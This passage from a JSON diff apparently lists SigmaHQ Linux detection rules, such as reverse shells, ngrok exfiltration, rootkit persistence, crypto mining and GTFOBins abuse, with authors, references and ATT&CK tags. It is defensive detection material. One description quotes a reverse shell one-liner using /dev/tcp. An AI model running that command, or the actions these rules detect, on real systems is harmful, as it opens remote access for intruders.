as a way to check if the backdoor is already running.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/05", + "falsepositive": [ + "Unlikely" + ], + "filename": "file_event_lnx_triple_cross_rootkit_lock_file.yml", + "level": 
"high", + "logsource.category": "file_event", + "logsource.product": "linux", + "refs": [ + "https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L33", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_event/file_event_lnx_triple_cross_rootkit_lock_file.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "c0239255-822c-4630-b7f1-35362bcb8f44", + "value": "Triple Cross eBPF Rootkit Default LockFile" + }, + { + "description": "Detects the creation of \"ebpfbackdoor\" files in both \"cron.d\" and \"sudoers.d\" directories. Which both are related to the TripleCross persistence method", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/05", + "falsepositive": [ + "Unlikely" + ], + "filename": "file_event_lnx_triple_cross_rootkit_persistence.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "linux", + "refs": [ + "https://github.com/h3xduck/TripleCross/blob/12629558b8b0a27a5488a0b98f1ea7042e76f8ab/apps/deployer.sh", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_event/file_event_lnx_triple_cross_rootkit_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.t1053.003" + ] + }, + "uuid": "1a2ea919-d11d-4d1e-8535-06cda13be20f", + "value": "Triple Cross eBPF Rootkit Default Persistence" + }, + { + "description": "Detects the creation of doas.conf file in linux host platform.", + "meta": { + "author": "Sittikorn S, Teoderick Contreras", + "creation_date": "2022/01/20", + "falsepositive": [ + "Unlikely" + ], + "filename": "file_event_lnx_doas_conf_creation.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "linux", + "refs": [ + "https://research.splunk.com/endpoint/linux_doas_conf_file_creation/", + "https://www.makeuseof.com/how-to-install-and-use-doas/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_event/file_event_lnx_doas_conf_creation.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548" + ] + }, + "uuid": "00eee2a5-fdb0-4746-a21d-e43fbdea5681", + "value": "Linux Doas Conf File Creation" + }, + { + "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/11/03", + "falsepositive": [ + "Legitimate use of ngrok" + ], + "filename": "net_connection_lnx_ngrok_tunnel.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "linux", + "refs": [ + "https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent", + "https://twitter.com/hakluke/status/1587733971814977537/photo/1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/network_connection/net_connection_lnx_ngrok_tunnel.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.command_and_control", + "attack.t1567", + "attack.t1568.002", + "attack.t1572", + "attack.t1090", + "attack.t1102", + "attack.s0508" + ] + }, + "uuid": "19bf6fdb-7721-4f3d-867f-53467f6a5db6", + "value": "Communication To Ngrok Tunneling Service - Linux" + }, + { + "description": "Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/10/16", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_lnx_back_connect_shell_dev.yml", + "level": "critical", + "logsource.category": "network_connection", + "logsource.product": "linux", + "refs": [ + "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml" + ], + "tags": "No established tags" + }, + "uuid": "83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871", + "value": "Linux Reverse Shell Indicator" + }, + { + "description": "Detects process connections to a Monero crypto mining pool", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/10/26", + "falsepositive": [ + "Legitimate use of crypto miners" + ], + "filename": "net_connection_lnx_crypto_mining_indicators.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "linux", + "refs": [ + "https://www.poolwatch.io/coin/monero", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/network_connection/net_connection_lnx_crypto_mining_indicators.yml" + ], + "tags": "No established tags" + }, + "uuid": "a46c93b7-55ed-4d27-a41b-c259456c4746", + "value": "Linux Crypto Mining Pool Connections" + }, + { + "description": "Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/10/15", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_lnx_sudo_cve_2019_14287.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://access.redhat.com/security/cve/cve-2019-14287", + "https://twitter.com/matthieugarin/status/1183970598210412546", + "https://www.openwall.com/lists/oss-security/2019/10/14/1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_sudo_cve_2019_14287.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068", + "attack.t1548.003", + "cve.2019.14287" + ] + }, + "uuid": "f74107df-b6c6-4e80-bf00-4170b658162b", + "value": "Sudo Privilege Escalation CVE-2019-14287" + }, + { + "description": "Detects usage of base64 utility to decode arbitrary base64-encoded text", + "meta": { + 
"author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2020/10/19", + "falsepositive": [ + "Legitimate activities" + ], + "filename": "proc_creation_lnx_base64_decode.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_base64_decode.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "e2072cab-8c9a-459b-b63c-40ae79e27031", + "value": "Decode Base64 Encoded Text" + }, + { + "description": "Detects the enumeration of other remote systems.", + "meta": { + "author": "Alejandro Ortuno, oscd.community", + "creation_date": "2020/10/22", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_remote_system_discovery.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_remote_system_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1018" + ] + }, + "uuid": "11063ec2-de63-4153-935e-b1a8b9e616f1", + "value": "Linux Remote System Discovery" + }, + { + "description": "Detects disabling security tools", + "meta": { + "author": "Ömer Günal, Alejandro Ortuno, oscd.community", + "creation_date": "2020/06/17", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_security_tools_disabling.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ] + }, + "uuid": "e3a8a052-111f-4606-9aee-f28ebeb76776", + "value": "Disabling Security Tools" + }, + { + "description": "Detects execution of a the file \"execve_hijack\" which is used by the Triple Cross rootkit as a way to elevate privileges", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/05", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L275", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation" + ] + }, + "uuid": "0326c3c8-7803-4a0f-8c5c-368f747f7c3e", + "value": "Triple Cross eBPF Rootkit Execve Hijack" + }, + { + "description": "Detects usage of \"vim\" and it's sibilings as a GTFOBin to execute and proxy command and binary execution", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_lnx_gtfobin_vim.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://gtfobins.github.io/gtfobins/vim/", + "https://gtfobins.github.io/gtfobins/vimdiff/", + "https://gtfobins.github.io/gtfobins/rvim/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_gtfobin_vim.yml" + ], + 
"tags": [ + "attack.discovery", + "attack.t1083" + ] + }, + "uuid": "7ab8f73a-fcff-428b-84aa-6a5ff7877dea", + "value": "Vim GTFOBin Abuse - Linux" + }, + { + "description": "Detects suspicious interactive bash as a parent to rather uncommon child processes", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/14", + "falsepositive": [ + "Legitimate software that uses these patterns" + ], + "filename": "proc_creation_lnx_susp_interactive_bash.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml" + ], + "tags": "No established tags" + }, + "uuid": "ea3ecad2-db86-4a89-ad0b-132a10d2db55", + "value": "Interactive Bash Suspicious Children" + }, + { + "description": "Detects usage of system utilities to discover files and directories", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2020/10/19", + "falsepositive": [ + "Legitimate activities" + ], + "filename": "proc_creation_lnx_file_and_directory_discovery.yml", + "level": "informational", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_file_and_directory_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1083" + ] + }, + "uuid": "d3feb4ee-ff1d-4d3d-bd10-5b28a238cc72", + "value": "File and Directory Discovery - Linux" + }, + { + "description": "Detects usage of \"find\" binary in a suspicious manner to perform discovery", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_lnx_susp_find_execution.yml", + 
"level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_find_execution.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1083" + ] + }, + "uuid": "8344c0e5-5783-47cc-9cf9-a0f7fd03e6cf", + "value": "Potential Discovery Activity Using Find - Linux" + }, + { + "description": "Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.\n", + "meta": { + "author": "Pawel Mazur, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "creation_date": "2021/10/15", + "falsepositive": [ + "Legitimate usage of xclip tools." + ], + "filename": "proc_creation_lnx_clipboard_collection.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://www.packetlabs.net/posts/clipboard-data-security/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml" + ], + "tags": [ + "attack.collection", + "attack.t1115" + ] + }, + "uuid": "ec127035-a636-4b9a-8555-0efd4e59f316", + "value": "Clipboard Collection with Xclip Tool" + }, + { + "description": "Detects enumeration of local systeam accounts. 
This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.", + "meta": { + "author": "Alejandro Ortuno, oscd.community", + "creation_date": "2020/10/08", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_local_account.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_local_account.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.001" + ] + }, + "uuid": "b45e3d6f-42c6-47d8-a478-df6bd6cf534c", + "value": "Local System Accounts Discovery - Linux" + }, + { + "description": "Detects events with patterns found in commands used for reconnaissance on linux systems", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/06/20", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_susp_recon_indicators.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/sleventyeleven/linuxprivchecker/blob/0d701080bbf92efd464e97d71a70f97c6f2cd658/linuxprivchecker.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_recon_indicators.yml" + ], + "tags": [ + "attack.reconnaissance", + "attack.t1592.004", + "attack.credential_access", + "attack.t1552.001" + ] + }, + "uuid": "0cf7a157-8879-41a2-8f55-388dd23746b7", + "value": "Linux Recon Indicators" + }, + { + "description": "Detects chmod targeting files in abnormal directory paths.", + "meta": { + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "creation_date": "2022/06/03", + "falsepositive": [ + "Admin changing file permissions." 
+ ], + "filename": "proc_creation_lnx_susp_chmod_directories.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md", + "https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_chmod_directories.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1222.002" + ] + }, + "uuid": "6419afd1-3742-47a5-a7e6-b50386cd15f8", + "value": "Chmod Suspicious Directory" + }, + { + "description": "Detects python spawning a pretty tty", + "meta": { + "author": "Nextron Systems", + "creation_date": "2022/06/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_lnx_python_pty_spawn.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "c4042d54-110d-45dd-a0e1-05c47822c937", + "value": "Python Spawning Pretty TTY" + }, + { + "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml" + ], + "tags": [ + "attack.initial_access", + "attack.execution", + "attack.t1190", + "attack.t1059", + "cve.2022.26134" + ] + }, + "uuid": "7fb14105-530e-4e2e-8cfb-99f7d8700b66", + "value": "Atlassian Confluence CVE-2022-26134" + }, + { + "description": "Detects a suspicious curl process start the adds a file to a web request", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/15", + "falsepositive": [ + "Scripts created by developers and admins" + ], + "filename": "proc_creation_lnx_susp_curl_fileupload.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://twitter.com/d1r4c/status/1279042657508081664", + "https://curl.se/docs/manpage.html", + "https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file", + "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567", + "attack.t1105" + ] + }, + "uuid": "00b90cc1-17ec-402c-96ad-3a8117d7a582", + "value": "Suspicious Curl File Upload - Linux" + }, + { + "description": "Detects usage of \"apt\" and \"apt-get\" as a GTFOBin to execute and proxy command and binary execution", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_lnx_gtfobin_apt.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + 
"https://gtfobins.github.io/gtfobins/apt/", + "https://gtfobins.github.io/gtfobins/apt-get/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_gtfobin_apt.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1083" + ] + }, + "uuid": "bb382fd5-b454-47ea-a264-1828e4c766d6", + "value": "Apt GTFOBin Abuse - Linux" + }, + { + "description": "Detects execution of the \"userdel\" binary. Which is used to delete a user account and related files. This is sometimes abused by threat actors in order to cover their tracks", + "meta": { + "author": "Tuan Le (NCSGroup)", + "creation_date": "2022/12/26", + "falsepositive": [ + "Legitimate administrator activities" + ], + "filename": "proc_creation_lnx_userdel.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://linuxize.com/post/how-to-delete-group-in-linux/", + "https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/", + "https://linux.die.net/man/8/userdel", + "https://www.cyberciti.biz/faq/linux-remove-user-command/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_userdel.yml" + ], + "tags": [ + "attack.impact", + "attack.t1531" + ] + }, + "uuid": "08f26069-6f80-474b-8d1f-d971c6fedea0", + "value": "User Has Been Deleted Via Userdel" + }, + { + "description": "Detects system information discovery commands", + "meta": { + "author": "Ömer Günal, oscd.community", + "creation_date": "2020/10/08", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_system_info_discovery.yml", + "level": "informational", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_system_info_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1082" + ] + }, + "uuid": "42df45e7-e6e9-43b5-8f26-bec5b39cc239", + "value": "System Information Discovery" + }, + { + "description": "Detects command line parameters or strings often used by crypto miners", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/10/26", + "falsepositive": [ + "Legitimate use of crypto miners" + ], + "filename": "proc_creation_lnx_crypto_mining.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://www.poolwatch.io/coin/monero", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml" + ], + "tags": "No established tags" + }, + "uuid": "9069ea3c-b213-4c52-be13-86506a227ab1", + "value": "Linux Crypto Mining Indicators" + }, + { + "description": "Detects potential overwriting and deletion of a file using DD.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "creation_date": "2021/10/15", + "falsepositive": [ + "Any user deleting files that way." 
+ ], + "filename": "proc_creation_lnx_dd_file_overwrite.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md#atomic-test-2---macoslinux---overwrite-file-with-dd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_dd_file_overwrite.yml" + ], + "tags": [ + "attack.impact", + "attack.t1485" + ] + }, + "uuid": "2953194b-e33c-4859-b9e8-05948c167447", + "value": "DD File Overwrite" + }, + { + "description": "Detects installation of suspicious packages using system installation utilities", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2023/01/03", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_install_suspicioua_packages.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_install_suspicioua_packages.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1553.004" + ] + }, + "uuid": "700fb7e8-2981-401c-8430-be58e189e741", + "value": "Suspicious Package Installed - Linux" + }, + { + "description": "Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. 
Detection will focus on crontab jobs uploaded from the tmp folder.", + "meta": { + "author": "Alejandro Ortuno, oscd.community", + "creation_date": "2020/10/06", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_schedule_task_job_cron.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_schedule_task_job_cron.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1053.003" + ] + }, + "uuid": "6b14bac8-3e3a-4324-8109-42f0546a347f", + "value": "Scheduled Cron Task/Job - Linux" + }, + { + "description": "Detects usage of system utilities to discover system network connections", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2020/10/19", + "falsepositive": [ + "Legitimate activities" + ], + "filename": "proc_creation_lnx_system_network_connections_discovery.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_system_network_connections_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1049" + ] + }, + "uuid": "4c519226-f0cd-4471-bd2f-6fbb2bb68a79", + "value": "System Network Connections Discovery - Linux" + }, + { + "description": "Detects enumeration of local network configuration", + "meta": { + "author": "Ömer Günal and remotephone, oscd.community", + "creation_date": "2020/10/06", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": 
"proc_creation_lnx_system_network_discovery.yml", + "level": "informational", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1016" + ] + }, + "uuid": "e7bd1cfa-b446-4c88-8afb-403bcd79e3fa", + "value": "System Network Discovery - Linux" + }, + { + "description": "Detects a suspicious curl process start on linux with set useragent options", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/15", + "falsepositive": [ + "Scripts created by developers and admins", + "Administrative activity" + ], + "filename": "proc_creation_lnx_susp_curl_useragent.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://curl.se/docs/manpage.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "b86d356d-6093-443d-971c-9b07db583c68", + "value": "Suspicious Curl Change User Agents - Linux" + }, + { + "description": "Detects suspicious sub processes of web server processes", + "meta": { + "author": "Florian Roth, Nasreddine Bencherchali (update)", + "creation_date": "2021/10/15", + "falsepositive": [ + "Web applications that invoke Linux command line tools" + ], + "filename": "proc_creation_lnx_webshell_detection.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/", + 
"https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_webshell_detection.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "818f7b24-0fba-4c49-a073-8b755573b9c7", + "value": "Linux Webshell Indicators" + }, + { + "description": "Detects the use of at/atd which are utilities that are used to schedule tasks.\nThey are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execution of malicious code\n", + "meta": { + "author": "Ömer Günal, oscd.community", + "creation_date": "2020/10/06", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_at_command.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_at_command.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053.002" + ] + }, + "uuid": "d2d642d7-b393-43fe-bae4-e81ed5915c4b", + "value": "Scheduled Task/Job At" + }, + { + "description": "Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/06/20", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_susp_history_recon.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/sleventyeleven/linuxprivchecker/", + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml" + ], + "tags": [ + "attack.reconnaissance", + "attack.t1592.004" + ] + }, + "uuid": "d7821ff1-4527-4e33-9f84-d0d57fa2fb66", + "value": "Print History File Contents" + }, + { + "description": "Detects the usage of the unsafe bpftrace option", + "meta": { + "author": "Andreas Hunkeler (@Karneades)", + "creation_date": "2022/02/11", + "falsepositive": [ + "Legitimate usage of the unsafe option" + ], + "filename": "proc_creation_lnx_bpftrace_unsafe_option_usage.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/", + "https://bpftrace.org/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.004" + ] + }, + "uuid": "f8341cb2-ee25-43fa-a975-d8a5a9714b39", + "value": "BPFtrace Unsafe Option Usage" + }, + { + "description": "Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell.\nScript being executed gets created as a temp file in /tmp folder with a scx* prefix.\nThen it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/.\nThe file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including\nMicrosoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.\n", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "creation_date": "2021/10/15", + "falsepositive": [ + "Legitimate use of SCX RunAsProvider ExecuteScript." 
